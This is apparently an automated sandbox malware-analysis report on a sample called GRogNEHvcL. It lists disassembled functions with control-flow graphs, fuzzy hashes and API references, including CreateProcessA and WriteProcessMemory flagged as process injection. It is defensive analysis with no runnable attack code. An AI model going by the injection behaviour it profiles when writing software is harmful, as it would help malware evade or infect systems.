                                            control_flow_graph 1188 8498b50-8498b80 1189 8498ba2-8498ba7 1188->1189 1190 8498b82-8498b85 1188->1190 1189->1190 1191 8498b8e-8498ba0 1190->1191 1192 8498b87 1190->1192 1191->1190 1192->1189 1192->1191 1193 8498ba9 1192->1193 1194 8498c6d-8498c72 1192->1194 1195 8498caf-8498cb3 1192->1195 1196 8498d8f-8498d94 1192->1196 1197 8498bee-8498bf0 1192->1197 1198 8498d23-8498d25 1192->1198 1199 8498bc5-8498bc8 1192->1199 1200 8498d99-8498dbf 1192->1200 1201 8498d19-8498d1e 1192->1201 1202 8498d78-8498d7c 1192->1202 1203 8498c38-8498c42 1192->1203 1204 8498c1a-8498c21 1192->1204 1205 8498cdf-8498ce9 1192->1205 1206 8498cfe-8498d05 1192->1206 1207 8498bbe-8498bc3 1192->1207 1208 8498df4-8498dfd 1192->1208 1209 8498c77-8498c8d 1192->1209 1222 8498bac-8498bae 1193->1222 1194->1190 1217 8498cb5-8498cbe 1195->1217 1218 8498cd4 1195->1218 1196->1190 1210 8498c0e 1197->1210 1211 8498bf2-8498bf8 1197->1211 1225 8498d43 1198->1225 1226 8498d27-8498d2d 1198->1226 1219 8498e0c 1199->1219 1227 8498bce-8498bd8 1199->1227 1258 8498dc1 1200->1258 1259 8498dc4-8498dce 1200->1259 1201->1190 1212 8498d88-8498d8d 1202->1212 1213 8498d7e 1202->1213 1214 8498e11-8498e19 1203->1214 1216 8498c48-8498c59 1203->1216 1204->1214 1215 8498c27-8498c33 1204->1215 1205->1214 1223 8498cef-8498cf9 1205->1223 1206->1214 1224 8498d0b-8498d14 1206->1224 1207->1190 1208->1219 1220 8498dff-8498e07 1208->1220 1209->1222 1251 8498c93-8498c9d 1209->1251 1237 8498c10-8498c11 1210->1237 1228 8498bfa-8498bfc 1211->1228 1229 8498bfe-8498c0a 1211->1229 1212->1196 1230 8498d83 1212->1230 1213->1230 1215->1190 1216->1214 1233 8498c5f-8498c68 1216->1233 1235 8498cc0-8498cc3 1217->1235 1236 8498cc5-8498cc8 1217->1236 1232 8498cd7-8498cde 1218->1232 1219->1214 1220->1190 1239 8498bb0 1222->1239 1240 8498bb7-8498bbc 1222->1240 1223->1190 1224->1190 1238 8498d45-8498d64 1225->1238 1241 8498d2f-8498d31 1226->1241 1242 8498d33-8498d3f 1226->1242 1227->1214 1243 8498bde-8498be7 1227->1243 1247 8498c0c 1228->1247 1229->1247 1230->1190 1233->1190 1248 8498cd2 1235->1248 1236->1248 1237->1204 1238->1214 1257 8498d6a-8498d73 1238->1257 1249 8498bb5 1239->1249 1240->1207 1240->1249 1244 8498d41 1241->1244 1242->1244 1245 8498be9 1243->1245 1246 8498bec 1243->1246 1244->1238 1245->1246 1246->1190 1247->1237 1248->1232 1249->1190 1251->1214 1254 8498ca3-8498caa 1251->1254 1254->1190 1257->1190 1258->1259 1260 8498dd0-8498dd2 1259->1260 1261 8498dd4 1259->1261 1262 8498dd7-8498de9 1260->1262 1261->1262 1262->1214 1264 8498deb-8498def 1262->1264 1264->1190
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q$LR]q$LR]q$$]q$$]q
                                            • API String ID: 0-2875722158
                                            • Opcode ID: 17d078797158918e3fc88a574760bdbea8988b7507381a9fd65b8d41e2031847
                                            • Instruction ID: 40ceca9a9283565571e04ff811ed74b899a89fe9ca23a4a0fd92205d9ccf5b9b
                                            • Opcode Fuzzy Hash: 17d078797158918e3fc88a574760bdbea8988b7507381a9fd65b8d41e2031847
                                            • Instruction Fuzzy Hash: 9F717A71A0411CCFDF248F6CC454BBEBFF2AB56316F08857BE496AB391C63899418B61
                                            Function 08498B4B Relevance: 3.9, Strings: 3, Instructions: 179COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1265 8498b4b-8498b80 1266 8498ba2-8498ba7 1265->1266 1267 8498b82-8498b85 1266->1267 1268 8498b8e-8498ba0 1267->1268 1269 8498b87 1267->1269 1268->1267 1269->1266 1269->1268 1270 8498ba9 1269->1270 1271 8498c6d-8498c72 1269->1271 1272 8498caf-8498cb3 1269->1272 1273 8498d8f-8498d94 1269->1273 1274 8498bee-8498bf0 1269->1274 1275 8498d23-8498d25 1269->1275 1276 8498bc5-8498bc8 1269->1276 1277 8498d99-8498dbf 1269->1277 1278 8498d19-8498d1e 1269->1278 1279 8498d78-8498d7c 1269->1279 1280 8498c38-8498c42 1269->1280 1281 8498c1a-8498c21 1269->1281 1282 8498cdf-8498ce9 1269->1282 1283 8498cfe-8498d05 1269->1283 1284 8498bbe-8498bc3 1269->1284 1285 8498df4-8498dfd 1269->1285 1286 8498c77-8498c8d 1269->1286 1299 8498bac-8498bae 1270->1299 1271->1267 1294 8498cb5-8498cbe 1272->1294 1295 8498cd4 1272->1295 1273->1267 1287 8498c0e 1274->1287 1288 8498bf2-8498bf8 1274->1288 1302 8498d43 1275->1302 1303 8498d27-8498d2d 1275->1303 1296 8498e0c 1276->1296 1304 8498bce-8498bd8 1276->1304 1335 8498dc1 1277->1335 1336 8498dc4-8498dce 1277->1336 1278->1267 1289 8498d88-8498d8d 1279->1289 1290 8498d7e 1279->1290 1291 8498e11-8498e19 1280->1291 1293 8498c48-8498c59 1280->1293 1281->1291 1292 8498c27-8498c33 1281->1292 1282->1291 1300 8498cef-8498cf9 1282->1300 1283->1291 1301 8498d0b-8498d14 1283->1301 1284->1267 1285->1296 1297 8498dff-8498e07 1285->1297 1286->1299 1328 8498c93-8498c9d 1286->1328 1314 8498c10-8498c11 1287->1314 1305 8498bfa-8498bfc 1288->1305 1306 8498bfe-8498c0a 1288->1306 1289->1273 1307 8498d83 1289->1307 1290->1307 1292->1267 1293->1291 1310 8498c5f-8498c68 1293->1310 1312 8498cc0-8498cc3 1294->1312 1313 8498cc5-8498cc8 1294->1313 1309 8498cd7-8498cde 1295->1309 1296->1291 1297->1267 1316 8498bb0 1299->1316 1317 8498bb7-8498bbc 1299->1317 1300->1267 1301->1267 1315 8498d45-8498d64 1302->1315 1318 8498d2f-8498d31 1303->1318 1319 8498d33-8498d3f 1303->1319 1304->1291 1320 8498bde-8498be7 1304->1320 1324 8498c0c 1305->1324 1306->1324 1307->1267 1310->1267 1325 8498cd2 1312->1325 1313->1325 1314->1281 1315->1291 1334 8498d6a-8498d73 1315->1334 1326 8498bb5 1316->1326 1317->1284 1317->1326 1321 8498d41 1318->1321 1319->1321 1322 8498be9 1320->1322 1323 8498bec 1320->1323 1321->1315 1322->1323 1323->1267 1324->1314 1325->1309 1326->1267 1328->1291 1331 8498ca3-8498caa 1328->1331 1331->1267 1334->1267 1335->1336 1337 8498dd0-8498dd2 1336->1337 1338 8498dd4 1336->1338 1339 8498dd7-8498de9 1337->1339 1338->1339 1339->1291 1341 8498deb-8498def 1339->1341 1341->1267
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q$$]q
                                            • API String ID: 0-2603884067
                                            • Opcode ID: a2246a41c67bde364964a8e9fd25235d5fde8d84ef9a34d73035e83c4559ce7a
                                            • Instruction ID: d5499312022b466b0c4d4d0d5a3a5bad15d985cd353e75c60bd2116785b75d30
                                            • Opcode Fuzzy Hash: a2246a41c67bde364964a8e9fd25235d5fde8d84ef9a34d73035e83c4559ce7a
                                            • Instruction Fuzzy Hash: AC614971E04118CFDF208F6CC854BBEBFF1AB56316F0D827BE496AB691D23899418B51
                                            Function 08493707 Relevance: 2.7, Strings: 2, Instructions: 206COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1418 8493707-849370e 1419 8493710-8493725 1418->1419 1420 8493705 1418->1420 1422 849372a-849372d 1419->1422 1420->1419 1423 849372f 1422->1423 1424 8493736-8493745 1422->1424 1423->1424 1425 8493779 1423->1425 1426 8493869-84938e0 1423->1426 1427 849379b-8493828 1423->1427 1428 84939fb-8493a08 1423->1428 1429 849376a-8493771 1423->1429 1430 8493952-84939c5 1423->1430 1431 8493755-8493762 1423->1431 1432 8493905-8493913 1423->1432 1433 8493a35-8493a3c 1423->1433 1434 8493a24 1423->1434 1440 849374e-8493753 1424->1440 1441 8493747 1424->1441 1447 8493786-8493789 1425->1447 1474 84938f8-8493900 1426->1474 1475 84938e2-84938e8 1426->1475 1490 849382b call 84989a8 1427->1490 1491 849382b call 84989b8 1427->1491 1493 8493a0a call 8496478 1428->1493 1494 8493a0a call 849646b 1428->1494 1436 849377c-8493781 1429->1436 1437 8493773-8493777 1429->1437 1480 84939cb-84939e4 1430->1480 1431->1429 1450 849392b-849393f call 8499d64 call 849ace9 1432->1450 1451 8493915-849391b 1432->1451 1446 8493a2b-8493a30 1434->1446 1436->1447 1437->1422 1440->1431 1449 849374c 1440->1449 1441->1449 1446->1447 1447->1427 1452 849378b 1447->1452 1449->1422 1464 8493945-849394d 1450->1464 1457 849391d 1451->1457 1458 849391f-8493921 1451->1458 1452->1426 1452->1427 1452->1428 1452->1430 1452->1432 1452->1433 1452->1434 1455 8493a10-8493a1e call 849bbf8 1455->1434 1457->1450 1458->1450 1464->1447 1474->1447 1476 84938ea 1475->1476 1477 84938ec-84938ee 1475->1477 1476->1474 1477->1474 1480->1436 1488 84939ea-84939f6 1480->1488 1481 8493831-8493833 1482 849384b-8493855 1481->1482 1483 8493835-849383b 1481->1483 1482->1436 1487 849385b-8493864 1482->1487 1485 849383d 1483->1485 1486 849383f-8493841 1483->1486 1485->1482 1486->1482 1487->1447 1488->1447 1490->1481 1491->1481 1493->1455 1494->1455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q
                                            • API String ID: 0-127220927
                                            • Opcode ID: 0abbe267f4cfd3b7b672224bd30c13b3648b83ad9307be93601d991e7790754a
                                            • Instruction ID: abf8e0f3a3edcea3558d150cc1ab143737ba98664a663224a58095fbaa0a76aa
                                            • Opcode Fuzzy Hash: 0abbe267f4cfd3b7b672224bd30c13b3648b83ad9307be93601d991e7790754a
                                            • Instruction Fuzzy Hash: 7271BE74B002049FDB249F78E959B6E7FE2EF89705F10846AF8529B3D4DE348C028B94
                                            Function 0849E4B8 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1668 849e4b8-849e4db 1669 849e4dd 1668->1669 1670 849e4e2-849e61c 1668->1670 1669->1670 1679 849e5ab-849e5d8 call 849e488 1670->1679 1683 849e52a-849e52f 1679->1683 1684 849e5de-849e5df 1679->1684 1686 849e535-849e536 1683->1686 1687 849e6c7-849e6cd 1683->1687 1684->1683 1686->1687 1706 849e6cf call 849edef 1687->1706 1707 849e6cf call 849ec80 1687->1707 1688 849e6d5-849e6d6 1690 849e552-849e61f 1688->1690 1692 849e621-849e625 1690->1692 1693 849e53b-849e550 1692->1693 1694 849e62b-849e6ad call 849f3a0 1692->1694 1693->1690 1697 849e581-849e5a6 1693->1697 1704 849e6b3-849e6bd 1694->1704 1697->1679 1701 849e6be-849e6c2 1697->1701 1701->1687 1701->1692 1706->1688 1707->1688
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q
                                            • API String ID: 0-3320153681
                                            • Opcode ID: b952d29f14d9210d0b5106a546d90a1f92a7622ecbaa3c3407f387684f4c95fc
                                            • Instruction ID: b1ccf10ec8089be1e13e3ded152c51b3fcc220e31a763137e94d161d3c5b35f4
                                            • Opcode Fuzzy Hash: b952d29f14d9210d0b5106a546d90a1f92a7622ecbaa3c3407f387684f4c95fc
                                            • Instruction Fuzzy Hash: B771B2B4E042088FDF18CFE9C584AEDBBF6AF89311F10912AE419AB355DB746946CB50
                                            Function 08493792 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1605 8493792-8493799 1606 849379b-8493828 1605->1606 1607 8493781 1605->1607 1666 849382b call 84989a8 1606->1666 1667 849382b call 84989b8 1606->1667 1608 8493786-8493789 1607->1608 1608->1606 1610 849378b 1608->1610 1610->1606 1611 8493869-84938e0 1610->1611 1612 84939fb-8493a08 1610->1612 1613 8493952-84939c5 1610->1613 1614 8493905-8493913 1610->1614 1615 8493a35-8493a3c 1610->1615 1616 8493a24 1610->1616 1646 84938f8-8493900 1611->1646 1647 84938e2-84938e8 1611->1647 1663 8493a0a call 8496478 1612->1663 1664 8493a0a call 849646b 1612->1664 1658 84939cb-84939e4 1613->1658 1624 849392b-849393f call 8499d64 call 849ace9 1614->1624 1625 8493915-849391b 1614->1625 1622 8493a2b-8493a30 1616->1622 1622->1608 1637 8493945-849394d 1624->1637 1629 849391d 1625->1629 1630 849391f-8493921 1625->1630 1627 8493a10-8493a1e call 849bbf8 1627->1616 1629->1624 1630->1624 1637->1608 1646->1608 1651 84938ea 1647->1651 1652 84938ec-84938ee 1647->1652 1648 8493831-8493833 1649 849384b-8493855 1648->1649 1650 8493835-849383b 1648->1650 1656 849385b-8493864 1649->1656 1657 849377c 1649->1657 1654 849383d 1650->1654 1655 849383f-8493841 1650->1655 1651->1646 1652->1646 1654->1649 1655->1649 1656->1608 1657->1607 1658->1657 1660 84939ea-84939f6 1658->1660 1660->1608 1663->1627 1664->1627 1666->1648 1667->1648
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q
                                            • API String ID: 0-127220927
                                            • Opcode ID: 02de8a724eff652576211314afcb78bcb1557d340d04758078dbfea0459393f2
                                            • Instruction ID: 51ac1e7aa81678c159b27a219884b0fe9b4dbb1997d0a47922da55a0d984e7ce
                                            • Opcode Fuzzy Hash: 02de8a724eff652576211314afcb78bcb1557d340d04758078dbfea0459393f2
                                            • Instruction Fuzzy Hash: 9451AF34B402049FDB249F78E959B6E7FE2EF95705F10842AF9129B3D4DE748C028BA4
                                            Function 0849E455 Relevance: 2.7, Strings: 2, Instructions: 174COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q
                                            • API String ID: 0-3320153681
                                            • Opcode ID: 2faf370f13c30ebeea9554191810ad85e36b606c1bfbc62f31b3aac1b3d9795e
                                            • Instruction ID: 0c9aebfe8b85d573c38ad4a65968dbee99e11fa763e06f80794cae9d794852e1
                                            • Opcode Fuzzy Hash: 2faf370f13c30ebeea9554191810ad85e36b606c1bfbc62f31b3aac1b3d9795e
                                            • Instruction Fuzzy Hash: C661E374E04248CFDF14CFE9C884AADBFB6BF89311F10812AE509AB355DB755946CB50
                                            Function 0849E46E Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q
                                            • API String ID: 0-3320153681
                                            • Opcode ID: 270b8174ab05d15c14858c98c6f4b06c35eb2dccebf654d19ddefe03d4b32993
                                            • Instruction ID: bd90a114decb3c41b500ed44a6bee46e97cf55328aaa3c5d3f2607a4319b724d
                                            • Opcode Fuzzy Hash: 270b8174ab05d15c14858c98c6f4b06c35eb2dccebf654d19ddefe03d4b32993
                                            • Instruction Fuzzy Hash: 016101B4E04248CFDF18CFE9C584AADBBF6BF88311F14802AE449AB365DB745946CB50
                                            Function 0849E4AB Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q
                                            • API String ID: 0-3320153681
                                            • Opcode ID: ac8f96b0105db0353e2817c959860313d73ef8ef323e8ac4ade382842b6b96e8
                                            • Instruction ID: 42f9f72979862698ea51bb4d86dcaf70668080daf931cf891ed89bbbad58053f
                                            • Opcode Fuzzy Hash: ac8f96b0105db0353e2817c959860313d73ef8ef323e8ac4ade382842b6b96e8
                                            • Instruction Fuzzy Hash: EE51D474E04208CFDF14CFE9C884AADBBF6BF89311F10912AE419AB355DB745946CB50
                                            Function 08497290 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Haq$Haq
                                            • API String ID: 0-4016896955
                                            • Opcode ID: b07000118a98ba030be9b9c44a59e95e855a97cb6617dee4d36916ddbab935cb
                                            • Instruction ID: 687d20a92a4f7dc2a0f9e2dfc0d843021e7d7da6ca926c732580e433509eb21a
                                            • Opcode Fuzzy Hash: b07000118a98ba030be9b9c44a59e95e855a97cb6617dee4d36916ddbab935cb
                                            • Instruction Fuzzy Hash: 69312771A24251DFCF21CF7C981037ABFA1FB45312F044AABE4A9872C2C7789505C7A2
                                            Function 06E4512D Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E4536E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 77e44a61aedc0cd8e03a3d259d1e3b0b6e82e3c60488efc56a3bfa9d9ebb23d5
                                            • Instruction ID: fb7983fff1e4afef1739dfbd57a2ff0fc8373e8dcb03089dbbd7a2b68510dccf
                                            • Opcode Fuzzy Hash: 77e44a61aedc0cd8e03a3d259d1e3b0b6e82e3c60488efc56a3bfa9d9ebb23d5
                                            • Instruction Fuzzy Hash: 8EA18B71D00319CFDB64DFA8D8407EDBBB2BF49314F1485AAE809A7290DB749986CF91
                                            Function 06E45138 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E4536E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: bebcd7736e30d8c1c7864783fc529204a5469f6f3a854dd0788faeaa6a3060ca
                                            • Instruction ID: f71bc3635654de9010257f6dca2e4f4a1beb8e9a3fdb95a66e776877bf365792
                                            • Opcode Fuzzy Hash: bebcd7736e30d8c1c7864783fc529204a5469f6f3a854dd0788faeaa6a3060ca
                                            • Instruction Fuzzy Hash: B3917A71D00319CFDB64DFA8D840BEDBBB2BF48314F1485AAE819A7250DB749986CF91
                                            Function 0119ADA8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0119AFFE
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: b0b0ba2ab8cd53a6d628826dd265d140cdbbc774c487b730c6563f30d6d68023
                                            • Instruction ID: 02087532f7d20ec130b8488ff611328dbb5fe4d4e2d13a779e12b036fb14c0a1
                                            • Opcode Fuzzy Hash: b0b0ba2ab8cd53a6d628826dd265d140cdbbc774c487b730c6563f30d6d68023
                                            • Instruction Fuzzy Hash: F3716670A00B158FDB28DF2AE14175ABBF5FF88304F00892DD59AD7A50DB75E849CBA1
                                            Function 011944B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 011959C9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: fa5c9bc5d03bceafbae100ab9267018f1b62cb2f2dc65a3d97275e3ad70e40e5
                                            • Instruction ID: 4f074dd23432d19e3daeb550799c8b19d28a1e7aee2a904199dcbd378537a307
                                            • Opcode Fuzzy Hash: fa5c9bc5d03bceafbae100ab9267018f1b62cb2f2dc65a3d97275e3ad70e40e5
                                            • Instruction Fuzzy Hash: 4A41D1B0C0072DCBDB29DFA9C884B9DBBB6BF49304F20806AD418BB255DB756945CF91
                                            Function 0119590D Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 011959C9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 3f6ffef6f8b1debdebd40bed188dd0259c8c7b102ef7272bcd448ae28db8725f
                                            • Instruction ID: 14d35b0dfd95fc5fbab9c6bdc1279445ecbfa9f7eec66e703fd11bca2c5933a0
                                            • Opcode Fuzzy Hash: 3f6ffef6f8b1debdebd40bed188dd0259c8c7b102ef7272bcd448ae28db8725f
                                            • Instruction Fuzzy Hash: 5B41E2B0C0071DCBDB29DFA9C98479DBBB6BF49304F20805AD418BB255DB756946CF90
                                            Function 0119D751 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0119D656,?,?,?,?,?), ref: 0119D717
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 36b04745c7e6ba1327eed1b7ca108b97aacbb6769606b65716d1d8a8f5f7973b
                                            • Instruction ID: 6088f4a59ca349c94fffba03995174b2d5c848765d09a61fd8829081e78fa093
                                            • Opcode Fuzzy Hash: 36b04745c7e6ba1327eed1b7ca108b97aacbb6769606b65716d1d8a8f5f7973b
                                            • Instruction Fuzzy Hash: 7F31B078A803809FEB049F60F6467693BB6F788754F918829F9118B7C8DBB85956CF10
                                            Function 0849E6E0 Relevance: 1.6, Strings: 1, Instructions: 331COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: 3d80e44f696f62b69e910c1a027eb4dbc32b9544bd006a1a0ab328141dd44d23
                                            • Instruction ID: 83c1e34a519bc859a5c568639cae8c460666486c24a95996b59d1d5e630658f3
                                            • Opcode Fuzzy Hash: 3d80e44f696f62b69e910c1a027eb4dbc32b9544bd006a1a0ab328141dd44d23
                                            • Instruction Fuzzy Hash: 73D13574E04209CFCB14DFA8D480AEDBBBAFF88301F10962AD409AB355D774A946CF60
                                            Function 06E44EA8 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E44F40
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 28eb40b4caea3f87c1a4b2ab112268f3111590812dbf76291e2016f043ff36f7
                                            • Instruction ID: 90c44c3daf912a99cfb54ad457c432fd8759a517c0ce9739f6a7dd26ea45cf3e
                                            • Opcode Fuzzy Hash: 28eb40b4caea3f87c1a4b2ab112268f3111590812dbf76291e2016f043ff36f7
                                            • Instruction Fuzzy Hash: A5214875900349DFCB10DFAAD841BEEBBF5FF48314F108429E919A7251C7789944CBA4
                                            Function 072051A0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                            Download Yara Rule
                                            APIs
                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0720518D,?,?), ref: 0720523F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277333950.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7200000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DrawText
                                            • String ID:
                                            • API String ID: 2175133113-0
                                            • Opcode ID: ba7aea86074ec02d445dd4b41cdda547ddb5870aa777d2c3b1fe5deebcf3ed83
                                            • Instruction ID: cebf1705d139b83ea2a54f0761098a4396a69b8b668348839516eadf495a990d
                                            • Opcode Fuzzy Hash: ba7aea86074ec02d445dd4b41cdda547ddb5870aa777d2c3b1fe5deebcf3ed83
                                            • Instruction Fuzzy Hash: 7531E2B590024A9FCB10CF9AD884A9EFBF5FF58320F14842AE919A7350D374A554CFA4
                                            Function 07203A0C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                            Download Yara Rule
                                            APIs
                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0720518D,?,?), ref: 0720523F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277333950.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7200000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DrawText
                                            • String ID:
                                            • API String ID: 2175133113-0
                                            • Opcode ID: 8829d19849fecf40b98d1744faad06e304cea40a3bf5ed7f9f9d95f3329355e7
                                            • Instruction ID: 03dba4ca9e591eca8a14f4f5be60843a1000f74e67f7a65b9da43b0fbf8c93bf
                                            • Opcode Fuzzy Hash: 8829d19849fecf40b98d1744faad06e304cea40a3bf5ed7f9f9d95f3329355e7
                                            • Instruction Fuzzy Hash: 7831E0B591020A9FDB10CF9AD884AAEFBF5FF58310F14842AE919A7250D374A950CFA0
                                            Function 07205160 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                            Download Yara Rule
